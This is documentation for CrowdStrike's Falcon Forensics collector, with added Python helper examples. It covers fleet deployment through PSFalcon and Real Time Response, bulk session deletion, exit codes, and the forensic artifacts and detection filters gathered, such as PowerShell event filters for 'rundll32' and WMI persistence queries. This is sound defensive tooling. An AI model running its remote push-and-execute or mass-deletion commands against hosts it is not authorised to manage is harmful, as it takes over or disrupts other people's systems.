    Note: We recommend using Host Management in Falcon, but you can obtain this list from any source (such as a SIEM). Make sure it's a CSV spreadsheet with a column labeled Host ID listing the host IDs (agent IDs) where you want to run Falcon Forensics.

    1. Go to Hosts > Host Management.

    2. Apply filters as necessary to identify the list of machines where you want to run Falcon Forensics.

    3. Select the checkbox near each host you want to include in an exported CSV file.

    4. Click the Export icon and select CSV.

    5. After the spreadsheet generates, click the Download icon.

    6. Open the exported CSV spreadsheet to review it.

    7. Ensure that there is at least one column titled Host ID containing the hosts’ agent IDs. Each host has such an AID.
      Tip: You can delete any incorrect rows or even delete extra columns. The only required column is the Host ID column.
    8. Save the file as hostids.csv in a known location on your computer.
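
Before handing hostids.csv to Invoke-FalconDeploy it is worth checking that the file really has the one required column and that every value in it is usable; a blank or malformed Host ID row silently targets nothing, and a duplicate row targets the same host twice. The following pre-flight check is an added example (not CrowdStrike or PSFalcon code). The only column name it relies on, Host ID, comes from the steps above; the assumption that an agent ID is 32 hexadecimal characters and the sample spreadsheet are the example's own.

```python
"""Pre-flight check for the hostids.csv exported from Host Management.

Added example (not CrowdStrike's or PSFalcon's code). It validates that the
spreadsheet has the one required column, 'Host ID', and that every value in
it looks like a Falcon agent ID (AID). The 32-hex-character AID format is an
assumption made for this example; the sample CSV below is constructed.
"""
import csv
import io
import re

REQUIRED_COLUMN = "Host ID"
# Assumption: an AID is 32 lowercase hexadecimal characters.
AID_PATTERN = re.compile(r"^[0-9a-f]{32}$")


def load_host_ids(csv_text):
    """Return (valid_ids, problems) for a CSV exported from Host Management.

    valid_ids: de-duplicated AIDs in file order, lowercased.
    problems:  human-readable strings describing rows that would make the
               deployment target nothing or target a host twice.
    """
    reader = csv.DictReader(io.StringIO(csv_text))
    if reader.fieldnames is None or REQUIRED_COLUMN not in reader.fieldnames:
        raise ValueError(f"CSV is missing the required '{REQUIRED_COLUMN}' column")

    valid_ids, problems, seen = [], [], set()
    for line_no, row in enumerate(reader, start=2):  # line 1 is the header
        raw = (row.get(REQUIRED_COLUMN) or "").strip()
        if not raw:
            problems.append(f"line {line_no}: empty {REQUIRED_COLUMN}")
            continue
        aid = raw.lower()
        if not AID_PATTERN.match(aid):
            problems.append(f"line {line_no}: '{raw}' does not look like an AID")
            continue
        if aid in seen:
            problems.append(f"line {line_no}: duplicate AID {aid} skipped")
            continue
        seen.add(aid)
        valid_ids.append(aid)
    return valid_ids, problems


# Constructed sample: extra columns are allowed, only 'Host ID' matters.
SAMPLE_CSV = """Hostname,Host ID,Platform
ws-001,0123456789abcdef0123456789abcdef,Windows
ws-002,FEDCBA9876543210FEDCBA9876543210,Linux
ws-003,,Mac
ws-004,not-an-aid,Windows
ws-001,0123456789abcdef0123456789abcdef,Windows
"""

if __name__ == "__main__":
    ids, issues = load_host_ids(SAMPLE_CSV)
    print("hosts to deploy to:", ids)
    for issue in issues:
        print("warning:", issue)
```

Run it against the real export before deploying; if it raises, the Host ID column is missing or misnamed, and each warning names the spreadsheet line to fix.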

Deploy Falcon Forensics to hosts

Falcon Forensics is an executable that runs on workstations and servers. The executable must be on each host system where you want to gather data. Follow these steps to send the executable to each host.

  1. Open PowerShell and check the version.

    $PSVersionTable.PSVersion.ToString()

    If you don’t have at least version 5.1, download a more recent version from GitHub.

  2. Load PSFalcon modules.

    Import-Module PSFalcon

    Important: This step might require you to install PSFalcon with Install-Module PSFalcon first.
  3. Optional. List the PSFalcon modules.

    Get-Command -Module PSFalcon

  4. Request an API authentication token with your API credentials.

    Request-FalconToken
  5. When asked, enter your credentials.

  6. Import only the Host ID column of your csv file.

    $HostIds = (Import-Csv ./hostids.csv).'Host ID'
  7. Optional. Display the list of imported hosts.

    $HostIds
  8. Optional. See the help file for FalconDeploy.

    Get-Help Invoke-FalconDeploy
  9. Run FalconDeploy on the imported list of Mac or Linux host IDs contained in the $HostIds variable. Do so by replacing <path to FFC executable> with the full path to the saved executable on your computer and running one of these two commands.

    • Unzipped file

      Invoke-FalconDeploy -HostIds $HostIds -Path <path to FFC executable> -Arguments "-cid <CID with Checksum>" -QueueOffline $True
    • Zipped file

      Invoke-FalconDeploy -HostIds $HostIds -Archive <path to FFC archive> -Run <path to executable that was extracted> -Arguments "-cid <CID with Checksum>" -QueueOffline $True

    This creates a log file called FalconDeploy_<FileDateTime>.csv in your working directory. This file contains the status of any host and whether they were successful or queued.

  10. Open FalconDeploy_<FileDateTime>.csv in your default program, making sure to replace <FileDateTime> in the command with the actual numbers in your FalconDeploy CSV filename.

    .\FalconDeploy_<FileDateTime>.csv

  11. Optional. Review queued RTR commands.

    • Generate a CSV file with the filename pattern FalconQueue_<FileDateTime>.csv in your working directory.

      Get-FalconQueue

    • Open the queue CSV file listed in FalconQueue_<FileDateTime>.csv, making sure to replace <FileDateTime> in the command with the actual numbers in your FalconQueue CSV filename.

      .\FalconQueue_<FileDateTime>.csv

  12. Windows only. You can query a specific Windows Registry key associated with Falcon Forensics and store the results in a file. This is useful if you're trying to troubleshoot why a computer is not successfully completing a Falcon Forensics scan. The information that gets output can provide details around the failure.

    Invoke-FalconRTR 'reg query' 'HKLM\Software\CrowdStrike\FFC' $HostIds | Export-Csv .\FFC_Reg_Values.csv

    Note: This command will only run successfully on hosts that are online.
  13. Optional. Windows only. If necessary, you can delete A SPECIFIC SESSION using the SessionID from Get-FalconQueue, replacing <session_id> with the appropriate session ID found in FalconQueue_<FileDateTime>.csv.

    Remove-FalconSession -SessionId <session_id>
  14. Optional. Windows only. If necessary, you can delete EVERY SESSION listed in FalconQueue_<FileDateTime>.csv.

    Important: Use this command with caution, as it might delete an entire queue you do not want to fully delete.

    (((Import-Csv .\FalconQueue_<FileDateTime>.csv | Where-Object { -not $_.session_deleted_at }).session_id | Group-Object).Name).foreach{ Remove-FalconSession -Id $_ }
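
Because the queue-wide deletion in step 14 is irreversible, a dry run that lists exactly which sessions would be removed is useful before running it. The following is an added example (not PSFalcon code) that mirrors the selection logic of the PowerShell one-liner: read FalconQueue_<FileDateTime>.csv, skip rows whose session_deleted_at is already set, and de-duplicate session_id. It also takes an optional subset of session IDs, which covers the step 13 case of removing only chosen sessions. The column names session_id and session_deleted_at are the ones used above; the other columns and the sample rows are constructed for the example.

```python
"""Dry-run selection of RTR sessions before Remove-FalconSession.

Added example, not PSFalcon code. Reads a FalconQueue_<FileDateTime>.csv,
keeps rows whose session_deleted_at is empty, de-duplicates session_id and
returns the list so it can be reviewed before anything is deleted.
The columns session_id and session_deleted_at come from the document; the
remaining columns and the sample rows are constructed.
"""
import csv
import io


def sessions_to_remove(queue_csv_text, only_session_ids=None):
    """Return the ordered, de-duplicated session IDs that are not yet deleted.

    only_session_ids: optional collection restricting the result to chosen
    sessions (the 'delete a specific session' case); None means all.
    """
    reader = csv.DictReader(io.StringIO(queue_csv_text))
    for col in ("session_id", "session_deleted_at"):
        if col not in (reader.fieldnames or []):
            raise ValueError(f"queue CSV has no '{col}' column")

    ordered = []
    for row in reader:
        if (row["session_deleted_at"] or "").strip():
            continue  # already deleted: nothing to remove
        sid = (row["session_id"] or "").strip()
        if not sid or sid in ordered:
            continue  # blank, or a second queued command in the same session
        if only_session_ids is not None and sid not in only_session_ids:
            continue
        ordered.append(sid)
    return ordered


# Constructed sample: two queued commands in sess-aaa, one already-deleted
# session (sess-bbb) and one live session (sess-ccc).
SAMPLE_QUEUE_CSV = """session_id,aid,cloud_request_id,session_deleted_at
sess-aaa,aid-01,req-0001,
sess-aaa,aid-01,req-0002,
sess-bbb,aid-02,req-0003,2024-01-01T00:00:00Z
sess-ccc,aid-03,req-0004,
"""

if __name__ == "__main__":
    pending = sessions_to_remove(SAMPLE_QUEUE_CSV)
    print(f"would remove {len(pending)} session(s): {pending}")
```

Point it at the real FalconQueue_<FileDateTime>.csv and compare the printed list with what you expect before running the Remove-FalconSession loop.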
Run Falcon Forensics Collector with RTR

  1. Upload the Falcon Forensics executable to your Response Scripts and Put files from Host setup and management > Response and containment > Response scripts and files.

  2. Open a RTR session with the host, and go to the directory where you’d like the executable to be placed. For example, /tmp.

  3. Put the executable.

    Note: Linux only. RTR removes the executable flag when used on Linux. To fix this, use the Edit and Run scripts section to run chmod +x <executable>, replacing <executable> with the name you assigned to it.
  4. Run the executable with a -CommandLine argument, replacing <CID> with your CID and checksum. For example:

    run /tmpRtr/ffc -CommandLine="--cid <CID>"

After you launch Falcon Forensics using RTR, find the log from the execution in these locations.

Mac and Linux

/opt/CrowdStrike (ffc.log)

Windows

C:\crowdstrike

Run Falcon Forensics with Runscript

The RTR session times out in the console after 10 minutes, but the script continues to run in the background until the process is completed. Occasionally, the sensor prematurely determines the process is complete.

  1. Upload the Falcon Forensics executable to your Response Scripts.

  2. PUT files from Host setup and management > Response and containment > Response scripts and files.

  3. Open a RTR session with the host, and go to the directory where you’d like the executable to be placed. For example, /tmp.

  4. PUT the file using put <executable name>.

  5. RUN the following in the Edit and run scripts tab of RTR.

    /path/to/executable -cid <CID with checksum>

    If a proxy is needed, run this instead.

    HTTPS_PROXY=proxypath /path/to/executable -cid <CID with Checksum>

  6. Specify a timeout. For example, an hour would be Timeout=3600.

    Note: The default is 90 seconds, which is not enough time to complete the collection.

Ensure that Falcon Forensics is running

Run the following command to confirm that Falcon Forensics is running on a macOS or Linux machine.

ps -e | grep ffc
Note: If you change the name of the collector executable before executing, the process name changes as well, so modify your ps command to reflect that change.

For Windows, use the Get-Process command in PowerShell or open the machine’s Task Manager to confirm Falcon Forensics is running.

Forensics dashboards

Forensics dashboards include these features:

  • Data for child CIDs from the associated parent CID.

  • Fast rendering and informative dashboards.

  • Improved usability through drill-downs, parameters, filtering, and interactions.

  • Intuitive visualizations including graphs, charts, and maps.

  • Live view option for real-time updating of information.

The parent CID must have a Falcon Forensics subscription to collect and route forensics data and for users to see child CID data.

For more information about creating queries using CrowdStrike Query Language (CQL), see Learn the CrowdStrike Query Language Using Falcon Data.

View deployment status
  1. From the Falcon console, go to Endpoint security > Forensics > Deployment status.

  2. Optional. To narrow the results, enter parameters and click Apply.

  3. Click an element to view details for hosts.

View File event log
  1. From the Falcon console, go to Endpoint security > Forensics > File event log.

  2. Optional. To narrow the results, enter parameter values.

  3. Click Apply.

  4. Scroll down to view the Event Timeline.

  5. Continue scrolling to view the Host File Inventory and Critical Files panels. These panels include four data fields:

    1. IOC Type: Classification of the method used.

    2. Custom IOC Severity: Indicates the level of threat severity for the event.

    3. Confidence: The level of confidence that this event indicates for a threat.

    4. Threat Type: Classification of the potential threat.

      Note: All columns are visible; however, if you don’t have Falcon Intelligence, Threat Types will remain blank, and the drill-down menu associated with intel correlation and the custom IOCs page won’t work. When populated, you can click the field value to drill down for more event details.
  6. Click an event to view more details.

View Host event info
  1. From the Falcon console, go to Endpoint security > Forensics > Host info.

  2. Optional. To narrow the results, enter parameters and click Apply.

  3. Continue scrolling to view these panels:

    • Events
    • Users
    • Process Info
    • Networked Process Info
    • Network Interfaces
    • Windows
    • IOC File Overview
    • Host File Overview
    • Suspicious File Overview
    • Critical File Overview
  4. Click an element to view details for specific hosts, users, or events.

View Host timeline
  1. From the Falcon console, go to Endpoint security > Forensics > Host timeline.

  2. Fill out the form and click Submit.

View Windows hunting leads
  1. From the Falcon console, go to Endpoint security > Forensics > Windows hunting leads.

  2. Fill out the form and click Submit.

  3. For each element, you can click View in Advanced event search or Export.

View the browser hunting dashboard

The Browser hunting dashboard provides visibility into events based on user, device, and browser information. You’ll no longer need to create queries and export results to access this data. To view the dashboard, go to Endpoint security > Forensics > Browser hunting.

To narrow your results, apply a filter using any of the available parameters such as company, user name, or platform. You can export any parts of the dashboard data at any time.
Note: To prevent the potential collection of personal information, browser data collection is disabled by default. Contact support to have it enabled.

Forensics event search

Search Forensics events by visually building queries. These searches help you quickly collect information during incident triage and hunting. Go to Endpoint security > Forensics > Event search.

Forensics advanced event search

Get direct access to sensor-aligned Forensics data that is combined with Investigate and XDR data to enable you to search for events with the Advanced event search page. Quickly collect information during incident triage and hunting and query for events using CQL. To view, manage, and investigate the events in the Falcon console, go to Endpoint security > Forensics > Advanced event search.

For more information, see Advanced Event Search.

Exit codes

When the application ends, it provides an exit code that can be used to determine why it exited.

Code Reason Explanation
0 - No error, success.
1 - Errors other than those below.
2 - Missing required parameters, invalid log level, missing CID, CID not matched, requested help info.
3 - Connect request timed out, connect request refused.
-1 / 0xffffffff / 4294967295 Collector is still running When the collector is started, the ExitCode registry value is set to a value that appears as one of these three codes, depending on which application, tool, or script is used to interpret the value and in what form it displays it. These are normal and expected values.

  • -1 (signed 32-bit decimal)

  • 0xffffffff (32-bit hex)

  • 4294967295 (unsigned decimal)

413 File size too big The file being uploaded to the cloud is too large (offline collection only).
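
Tooling that reads the exit code, for instance a script that processes the FFC_Reg_Values.csv exported by the reg query step of the deployment procedure, has to treat -1, 0xffffffff and 4294967295 as the same "still running" value rather than as three different outcomes. The following is an added example (not CrowdStrike code) that normalises the three spellings to one unsigned 32-bit integer, maps the codes in the table above (plus 116, the CID-mismatch exit mentioned under "Plan to deploy Falcon Forensics") to their reasons, and pulls the ExitCode value out of a reg query output line. The reg query sample is constructed.

```python
"""Interpret the Falcon Forensics exit code / ExitCode registry value.

Added example, not CrowdStrike code. The codes and reasons are those listed
in the exit-code table, plus 116 (CID check failed). The three spellings of
'still running' (-1, 0xffffffff, 4294967295) are the same 32-bit DWORD shown
by different tools, so they are normalised before lookup. Sample output of
'reg query' below is constructed.
"""
import re

STILL_RUNNING = "Collector is still running"

EXIT_CODE_REASONS = {
    0: "No error, success",
    1: "Errors other than those listed",
    2: "Missing required parameters, invalid log level, missing CID, "
       "CID not matched, or help info requested",
    3: "Connect request timed out or connect request refused",
    116: "CID check failed; the collection did not start",
    413: "File size too big: the file being uploaded to the cloud is too large "
         "(offline collection only)",
}


def normalize_exit_code(raw):
    """Turn a decimal, negative or 0x-hex string (or int) into an unsigned 32-bit int."""
    value = int(str(raw).strip(), 0)   # base 0 accepts '0x...' as well as decimal
    return value & 0xFFFFFFFF          # -1 -> 4294967295, i.e. the same as 0xffffffff


def explain_exit_code(raw):
    """Return the reason text for an exit code in any of its representations."""
    code = normalize_exit_code(raw)
    if code == 0xFFFFFFFF:
        return STILL_RUNNING
    return EXIT_CODE_REASONS.get(code, f"Unknown exit code {code}")


# One value line of 'reg query' output looks like:
#     ExitCode    REG_DWORD    0xffffffff
REG_LINE = re.compile(r"^\s*ExitCode\s+REG_DWORD\s+(\S+)\s*$", re.MULTILINE)


def exit_code_from_reg_query(reg_output):
    """Parse the ExitCode value from 'reg query HKLM\\Software\\CrowdStrike\\FFC' output.

    Returns (code, explanation), or None when no ExitCode value is present
    (for example because the collector has never run on that host).
    """
    match = REG_LINE.search(reg_output)
    if not match:
        return None
    code = normalize_exit_code(match.group(1))
    return code, explain_exit_code(code)


# Constructed sample of reg query output from a host mid-collection.
SAMPLE_REG_OUTPUT = """
HKEY_LOCAL_MACHINE\\Software\\CrowdStrike\\FFC
    ExitCode    REG_DWORD    0xffffffff
"""

if __name__ == "__main__":
    print(exit_code_from_reg_query(SAMPLE_REG_OUTPUT))
    for shown in ("-1", "0xffffffff", "4294967295", "0", "116", "413"):
        print(shown, "->", explain_exit_code(shown))
```

Masking with 0xFFFFFFFF is what makes the three representations collapse to one value; feeding the raw strings straight into a dictionary lookup would report "still running" for one spelling and "unknown" for the other two.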

Forensics data field definitions

For information about collected fields, see Events Full Reference (Events Data Dictionary). To learn how to query data, see Forensics Collector query sheet.

Artifacts collected by Falcon Forensics
Field Definition
amcache The AmCache is an artifact that stores metadata related to PE execution and program installation on Windows 7 and Server 2008 R2 and above. File hash is not calculated for files larger than 20MB.
browser (optionally collected) User browser history artifacts such as URLs, visit counts, and whether the webpage was navigated to by typing the address into the address bar.
dirlist Directory listing and file metadata artifacts are collected for files and directories that match the following conditions:

  • All files up to 15 directories deep recursively for the system drive, excluding files with the following file extensions: *.exe, *.dll, *.sys, *.acm, *.ax, *.cpl, *.drv, *.efi, *.ocx, *.scr, *.tsp, *.mui, *.rs, *.ime, *.rll, *.tsp, *.com, *.lnk, *.pst, *.fba, *.manifest, *.lmetadata, *.png, *.jpg, *.cat, *.dep, *.bnk, *.mum, *.xrm-ms, *.cdf-ms, *.resx, *.cdxml, *.adml, *.pri, *.wem, *.animset, *.asset, *.hpp, *.markup, *.dds, *.wav, and no file extension. File hash is not calculated for files larger than 5MB. Collected entries are limited to the first 500,000 files fitting these conditions.

  • All Portable Executable files up to 15 directories deep recursively for the system drive. File hash (sha1 and sha256) is not calculated for files larger than 20MB. Collected entries are limited to the first 100,000 files fitting these conditions.


drives Details on all disks mounted on the system.
drivers Windows driver artifacts to include name of module and other details. File hash is not calculated for files larger than 20MB.
env Environment variable artifacts.
events Capture event log entries matching the following conditions.
Event log source
Event Log Source Filter events occurring in the last # days Maximum number of event entries processed Filter
Application 1825 5000 None
Security 1825 5000 None
System 1825 5000 None
%windir%\System32\winevt\Logs\Symantec Endpoint Protection Client.evtx 1825 5000 (EVENTID==51 or EVENTID==45)
%windir%\System32\winevt\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx 1825 5000 EVENTID==3004
%windir%\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx 1825 5000 (EVENTID==21 or EVENTID==22 or EVENTID==24 or EVENTID==1101 or EVENTID==23 or EVENTID==25)
%windir%\System32\winevt\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx 1825 5000 EVENTID==1158
%windir%\System32\winevt\Logs\Microsoft-Windows-TaskScheduler%4Operational.evtx 1825 5000 (EVENTID==106 or EVENTID==200 or EVENTID==102 or EVENTID==141 or EVENTID==201) and (TEXT like '*\At*')
%windir%\System32\Winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx 1825 5000 (EVENTID==4104 and LEVEL eq 'WARNING')
%windir%\System32\Winevt\Logs\Windows Powershell.evtx 1825 5000 (EVENTID==400 or EVENTID==403 or EVENTID==600) AND ('rundll32' in TEXT OR 'powershell' in TEXT)
Field Definition
files Collect artifacts showing a high level roll up of files counts per extension per directory.
groups Windows user group information.
jobs Windows ‘At’ job information.
link Collect LNK file artifacts up to 15 directories deep recursively for the root of the system drive. File hash is not calculated for files larger than 20MB.
mal Collect information that might uncover instances of dll hijacking or Windows ‘sticky key’ abuse. Artifacts up to 15 directories deep recursively for the root of the system drive will be processed.
magic Collect information about files with unexpected ‘magic’ file header byte signatures. All Portable Executables files up to 15 directories deep recursively for the system drive will be processed. File hash is not calculated for files larger than 20MB.
mft Collect information about deleted MFT file records for files created in the last 365 days.
network Collect network information: system network addresses, netstat, arp, dns, host file, and route table information.
peinfo Extracts and collects portable executable (PE) header information from all Portable Executable files with a *.exe extension up to 15 directories deep recursively for the system drive.
pipes Collects system named pipe information.
prefetch Extract Windows prefetch information.
pslist Collect system process listing information. File hash is not calculated for files larger than 20MB.
recentfiles Extract Windows recent file cache (RecentFilepath.bcf) information. File hash is not calculated for files larger than 20MB.
regdump Collect registry key information from the following registry keys recursively. HKLM represents the HKEY Local Machine registry hive, and HKAU is a pseudo key representing all users HKEY Users registry hive.
regdump registry entries
  • HKLM\SOFTWARE\Microsoft\Windows\
    • Excluding sub keys: CurrentVersion\SideBySide, CurrentVersion\Component Based Servicing, CurrentVersion\Installer, CurrentVersion\Appmodel, CurrentVersion\Winevt, CurrentVersion\Perflib
  • HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\
    • Excluding sub keys: CurrentVersion\SideBySide, CurrentVersion\Component Based Servicing, CurrentVersion\Installer, CurrentVersion\Appmodel, CurrentVersion\Winevt, CurrentVersion\Perflib
  • HKLM\SOFTWARE\Classes\Local Settings\Software\Microsoft
  • HKLM\SECURITY\Policy
  • HKLM\SYSTEM\CurrentControlSet\Control\
  • WMI, Class, Notifications, NetDiagFX, Power
  • HKLM\SYSTEM\CurrentControlSet\Services
  • HKAU\SOFTWARE\Microsoft
  • HKAU\SOFTWARE\Classes\LocalSettings\Software\Microsoft
  • HKAU\SOFTWARE\Wow6432Node\Microsoft
  • HKAU\SOFTWARE\Classes\*\shellex
  • HKAU\SOFTWARE\LANDesk\Inventory\LogonHistory\Logons
  • HKAU\SOFTWARE\LANDesk\ManagementSuite\WinClient\SoftwareMonitoring\MonitorLog
  • HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\Bookmarks
  • HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\CDCache
  • HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\History
  • HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\Interface\Explorer
  • HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\LastFingerprints
  • HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\Usage\LifetimeCounters
  • HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\Usage\PeriodCounters
  • HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\SshHostKeys
  • HKAU\SOFTWARE\Sysinternals
  • HKAU\SOFTWARE\WinRAR\DialogEditHistory
  • HKAU\SOFTWARE\Wow6432Node\LANDesk\Inventory\LogonHistory\Logons
  • HKAU\SOFTWARE\Wow6432Node\LANDesk\ManagementSuite\WinClient\SoftwareMonitoring\MonitorLog
  • HKAU\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
  • HKAU\Software\7Zip
  • HKAU\Software\ATERA Networks\AlphaAgent\
  • HKAU\Software\AppDataLow\Software\Microsoft
  • HKAU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs
  • HKAU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLsTime
  • HKAU\Software\Classes\LocalSettings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLsVisitCount
  • HKAU\Software\Famatech\advanced_port_scanner
  • HKAU\Software\FileZillaPo\PuTTY\SshHostKeys
  • HKAU\Software\Nico Mak Computing\WinZip
  • HKAU\Software\SimonTatham\PuTTY
  • HKAU\Software\WinRAR\ArcHistory
  • HKAU\Software\Wow6432Node\7Zip
regfile

Collect references to files within the registry keys matching the specified conditions. HKLM represents the HKEY Local Machine registry hive, and HKAU is a pseudo key representing all users HKEY Users registry hive. File hash is not calculated for files larger than 20MB.

regfile registry entries
  • HKLM\SOFTWARE\Microsoft\Windows\
    • Excluding sub keys: CurrentVersion\SideBySide, CurrentVersion\Component Based Servicing, CurrentVersion\Installer, CurrentVersion\Appmodel, CurrentVersion\Winevt, CurrentVersion\Perflib
  • HKLM\SOFTWARE\Microsoft\Windows NT\
    • Excluding sub keys: CurrentVersion\SideBySide, CurrentVersion\Component Based Servicing, CurrentVersion\Installer, CurrentVersion\Appmodel, CurrentVersion\Winevt, CurrentVersion\Perflib
  • HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\
    • Excluding sub keys: CurrentVersion\SideBySide, CurrentVersion\Component Based Servicing, CurrentVersion\Installer, CurrentVersion\Appmodel, CurrentVersion\Winevt, CurrentVersion\Perflib
  • HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\
    • Excluding sub keys: CurrentVersion\SideBySide, CurrentVersion\Component Based Servicing, CurrentVersion\Installer, CurrentVersion\Appmodel, CurrentVersion\Winevt, CurrentVersion\Perflib
  • HKLM\SOFTWARE\Classes\LocalSettings\Software\Microsoft\
  • HKAU\SOFTWARE\Microsoft\Windows\
  • HKAU\SOFTWARE\Microsoft\Windows NT\
  • HKAU\SOFTWARE\Wow6432Node\Microsoft\
  • HKAU\SOFTWARE\Wow6432Node\Microsoft NT\
  • HKAU\SOFTWARE\Classes\LocalSettings\Software\Microsoft
Artifacts
Field Definition
services Collect Windows Services enumeration information. File hash is not calculated for files larger than 20MB.
shares Collect Windows network share information.
shellbags Extract registry shell bag MRU.
shim Extract Shim Cache information. File hash is not calculated for files larger than 20MB.
superfetch Extract superfetch database file.
tasks Collect Windows scheduled task information using both the Task Scheduler 1.0 and 1.2/2.0 interfaces.
UAL Collect User Access Logging information. UAL is a feature in Windows Server that aggregates client usage data by role and products on a local server. It helps quantify requests from client computers for roles and services on a local server.
USB Extracts USB device enumeration information.
userassist Extracts UserAssist registry entry information.
users Collects Windows users information.
webshell Identifies Windows webshell script files. Identified files must have a minimum size of 64 bytes.
wmi Collects WMI information by issuing the defined WMI queries.
Windows Management Instrumentation (WMI) query
Query Namespace
SELECT * FROM __EventConsumer Root\Subscription
SELECT * FROM __EventFilter Root\Subscription
SELECT * FROM __FilterToConsumerBinding Root\Subscription
SELECT * FROM AntiVirusProduct Root\SecurityCenter2
SELECT * FROM AntiVirusProduct Root\SecurityCenter

Run collectors on network-contained hosts

The Falcon Forensics Collector relies on domain name resolution (DNS) to connect to the Falcon Cloud and upload its collected data. To resolve the domain name and upload data from a host that is network-contained by the Falcon sensor, add the cloud-specific static IPs for Falcon Forensics to the Falcon Containment Policy. For a list of IPs, see Falcon Forensics.

Understand generated spreadsheets

Falcon Forensics creates spreadsheets so you can track its progress across your chosen hosts. This is described in Deploy Falcon Forensics to hosts.

FalconDeploy_{FileDateTime}.csv

This document is automatically generated during the deployment of Falcon Forensics. The following is a description of important fields and columns found in it.

Field Definition
batch_id Created every time a request is made, covering up to 500 devices. If you request more than 500 devices, a second batch_id is created once the first reaches 500: device 501 gets the new batch_id, as would device 1001 if you requested that many.
aid The individual identifier for a host. Depending on the context, this might also be referred to as device_id or host_id. PSFalcon generally uses the name HostId or HostIds when looking for this field.
session_id The individual session for that device id (aid)
cloud_request_id The individual command request that is associated with the session. cloud_request_id is the unique value in the spreadsheet (aid, session_id, and batch_id are likely to be repeated).

For each cloud_request_id there is an associated complete status, TRUE or FALSE, depending on whether or not the command was issued to the host.

  • If the command was SUCCESSFUL, you will see a value in the stdout (standard output) field.

  • If the command produced an ERROR, you will see a value in the stderr (standard error) field.

Note: If complete is FALSE and offline_queued is TRUE, you will not see any information in the stdout or stderr columns because the host has not received those commands yet.

A successful run of the script has three cloud_request_ids for each individual host, with the following stdout values:

  • C:\ The session was initialized (deployment_step: session_start)

  • Operation completed successfully. The executable was placed on the host (deployment_step: put_file)

  • The process was successfully started. The executable was successfully launched (deployment_step: run_file)
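To show how these fields fit together, here is an added Python example (not CrowdStrike's or PSFalcon's code) that reads a FalconDeploy CSV and classifies each host by the three-step rule above. It assumes the columns carry the field names described here plus a deployment_step column; the sample rows are constructed.

```python
import csv
import io
from collections import defaultdict

# The three deployment steps a fully successful run leaves behind for a host.
EXPECTED_STEPS = ("session_start", "put_file", "run_file")

# Constructed sample of a FalconDeploy_{FileDateTime}.csv. Column names follow the
# field descriptions above (deployment_step, complete, offline_queued, stdout and
# stderr are assumed to be columns); every value is made up for this example.
SAMPLE_CSV = r"""batch_id,aid,session_id,cloud_request_id,deployment_step,complete,offline_queued,stdout,stderr
b-001,aid-host1,sess-1,req-1,session_start,TRUE,FALSE,C:\,
b-001,aid-host1,sess-1,req-2,put_file,TRUE,FALSE,Operation completed successfully.,
b-001,aid-host1,sess-1,req-3,run_file,TRUE,FALSE,The process was successfully started.,
b-001,aid-host2,sess-2,req-4,session_start,TRUE,FALSE,C:\,
b-001,aid-host2,sess-2,req-5,put_file,TRUE,FALSE,,Access is denied.
b-001,aid-host3,sess-3,req-6,session_start,FALSE,TRUE,,
b-001,aid-host3,sess-3,req-7,put_file,FALSE,TRUE,,
b-001,aid-host3,sess-3,req-8,run_file,FALSE,TRUE,,
"""


def _is_true(value):
    """The spreadsheet stores booleans as the strings TRUE / FALSE."""
    return (value or "").strip().upper() == "TRUE"


def triage_deploy_csv(text):
    """Group FalconDeploy rows per host (aid) and classify the host's deployment state.

    deployed   - all three steps completed with stdout present
    error      - at least one request wrote to stderr
    queued     - commands not complete and offline_queued (host has not checked in yet)
    incomplete - anything else (for example, a missing step)
    """
    rows_by_host = defaultdict(list)
    for row in csv.DictReader(io.StringIO(text)):
        rows_by_host[row["aid"]].append(row)

    report = {}
    for aid, rows in rows_by_host.items():
        completed = {r["deployment_step"] for r in rows
                     if _is_true(r["complete"]) and (r["stdout"] or "").strip()}
        errors = [(r["deployment_step"], r["stderr"].strip())
                  for r in rows if (r["stderr"] or "").strip()]
        queued = any(not _is_true(r["complete"]) and _is_true(r["offline_queued"])
                     for r in rows)
        if errors:
            state = "error"
        elif all(step in completed for step in EXPECTED_STEPS):
            state = "deployed"
        elif queued:
            state = "queued"
        else:
            state = "incomplete"
        report[aid] = {
            "state": state,
            "steps_ok": [s for s in EXPECTED_STEPS if s in completed],
            "errors": errors,
            "requests": len(rows),
        }
    return report


def batch_host_counts(text):
    """Distinct hosts per batch_id. A batch never covers more than 500 hosts, so a
    larger count means the spreadsheet was merged or edited."""
    hosts = defaultdict(set)
    for row in csv.DictReader(io.StringIO(text)):
        hosts[row["batch_id"]].add(row["aid"])
    return {batch: len(aids) for batch, aids in hosts.items()}


if __name__ == "__main__":
    for aid, info in triage_deploy_csv(SAMPLE_CSV).items():
        print(aid, info["state"], info["steps_ok"], info["errors"])
    print(batch_host_counts(SAMPLE_CSV))
```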

FalconQueue_{FileDateTime}.csv

This document collects information for all sessions that have commands queued up. The following is a description of important fields and columns found in it.

Field Definition
aid The individual identifier for a device. Depending on the context, this might also be referred to as device_id or host_id. PSFalcon generally uses the name HostId or HostIds when looking for this field.
session_id The individual session for a device (aid).
cloud_request_id The unique individual command request that is associated with the session.
session_created_at When the initial interaction with the computer was made.
